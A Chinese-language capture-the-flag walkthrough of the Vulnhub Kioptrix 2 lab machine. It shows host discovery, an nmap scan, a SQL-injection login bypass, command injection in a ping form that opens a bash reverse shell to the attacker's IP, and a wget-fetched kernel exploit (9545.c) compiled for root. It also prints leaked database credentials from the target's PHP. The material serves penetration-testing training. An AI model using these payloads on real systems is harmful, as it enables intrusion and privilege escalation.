Vulnhub之Kioptrix 2靶机详细测试过程(提权成功)
Kioptrix 2
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.130 00:0c:29:b2:33:a0 1 60 VMware, Inc.
10.1.1.254 00:50:56:f7:60:d6 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为10.1.1.130
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 05:45 EST
Nmap scan report for 10.1.1.130
Host is up (0.00068s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)
| 1024 346b453dbacecab25355ef1e43703836 (DSA)
|_ 1024 684d8cbbb65abd7971b87147ea004261 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 629/udp status
|_ 100024 1 632/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-02-09T08:36:16+00:00; -2h09m40s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
632/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:B2:33:A0 (VMware)
Host script results:
|_clock-skew: -2h09m40s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.00 seconds
获得Shell
端口3306
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ mysql -uroot -p -h 10.1.1.130
Enter password:
ERROR 1130 (HY000): Host '10.1.1.143' is not allowed to connect to this MySQL server
似乎设置了访问规则,放弃这个方向
端口80
浏览器访问80端口,返回页面为用户登录窗口,用简单的绕过语句即可成功登录
admin' or 1=1 --
登录成功后,返回ping命令功能,看有无命令包含漏洞
提交语句:
127.0.0.1;which python
发现可以成功返回,因此接下来设法得到shell
127.0.0.1;bash -i >& /dev/tcp/10.1.1.143/5555 0>&1
Kali Linux上可以成功得到目标反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.130] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
bash-3.00$ cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
}
?>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ searchsploit kernel 2 | grep 9545.c
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation | linux/local/9545.c
bash-3.00$ wget http://10.1.1.143:8000/9545.c
wget http://10.1.1.143:8000/9545.c
--04:49:15-- http://10.1.1.143:8000/9545.c
=> `9545.c'
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]
100%[====================================>] 9,408 --.--K/s
04:49:15 (22.32 MB/s) - `9545.c' saved [9408/9408]
bash-3.00$ gcc -Wall -m64 -o exploit3 9545.c
gcc -Wall -m64 -o exploit3 9545.c
9545.c:1: sorry, unimplemented: 64-bit mode not compiled in
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -alh
ls -alh
total 888K
drwxr-xrwx 4 root root 4.0K Feb 9 04:50 .
drwxr-xr-x 23 root root 4.0K Feb 9 03:31 ..
-rw-r--r-- 1 apache apache 15K Feb 9 2023 33321.c
-rw-r--r-- 1 apache apache 2.5K Feb 9 2023 9542.c
-rw-r--r-- 1 apache apache 9.2K Feb 9 2023 9545.c
-rwxr-xr-x 1 apache apache 6.8K Feb 9 04:34 exploit1
-rwxr-xr-x 1 apache apache 12K Feb 9 04:43 exploit2
drwxrwxrwt 2 root root 4.0K Feb 9 03:32 .font-unix
drwxrwxrwt 2 root root 4.0K Feb 9 03:31 .ICE-unix
-rwxr-xr-x 1 apache apache 809K Feb 4 23:25 linpeas.sh
bash-3.00$ gcc -o exploit3 9545.c
gcc -o exploit3 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
ls
33321.c 9542.c 9545.c exploit1 exploit2 exploit3 linpeas.sh
bash-3.00$ ls -alh
ls -alh
total 896K
drwxr-xrwx 4 root root 4.0K Feb 9 04:55 .
drwxr-xr-x 23 root root 4.0K Feb 9 03:31 ..
-rw-r--r-- 1 apache apache 15K Feb 9 2023 33321.c
-rw-r--r-- 1 apache apache 2.5K Feb 9 2023 9542.c
-rw-r--r-- 1 apache apache 9.2K Feb 9 2023 9545.c
-rwxr-xr-x 1 apache apache 6.8K Feb 9 04:34 exploit1
-rwxr-xr-x 1 apache apache 12K Feb 9 04:43 exploit2
-rwxr-xr-x 1 apache apache 6.7K Feb 9 04:55 exploit3
drwxrwxrwt 2 root root 4.0K Feb 9 03:32 .font-unix
drwxrwxrwt 2 root root 4.0K Feb 9 03:31 .ICE-unix
-rwxr-xr-x 1 apache apache 809K Feb 4 23:25 linpeas.sh
bash-3.00$ chmod +x exploit3
chmod +x exploit3
bash-3.00$ ./exploit3
./exploit3
sh-3.00# cd /root
cd /root
用其他的提权代码都失败,比如9542.c等
STRIVE FOR PROGRESS,NOT FOR PERFECTION
